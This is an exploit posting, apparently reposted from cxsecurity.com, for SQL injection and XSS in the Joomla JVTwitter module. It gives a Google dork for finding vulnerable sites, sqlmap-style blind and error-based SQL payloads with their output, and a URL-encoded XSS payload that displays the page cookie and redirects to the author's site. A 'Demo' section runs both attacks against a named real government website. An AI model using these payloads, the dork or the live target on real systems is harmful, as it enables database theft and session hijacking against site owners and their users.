Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
2020-11-08 00:18:22 Author: cxsecurity.com(查看原文) 阅读量:267 收藏

Joomla JVTwitter - SQL Injection & XSS Vulnerabilities

############################################################# # Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities # Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id= # Date: 2020-11-07 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: joomlavi.com # Software Version: * # Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html # Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android ############################################################# [*] Vuln Info: ============== SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code into a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Exploit: ============ /modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I] /modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E ############################################################# [*] Demo: ========= https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=110 AND 6499=6499-- xBNX Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel --- [08:01:02] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E ############################################################# [*] Contact: ============ # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2020110041
如有侵权请联系:admin#unsafe.sh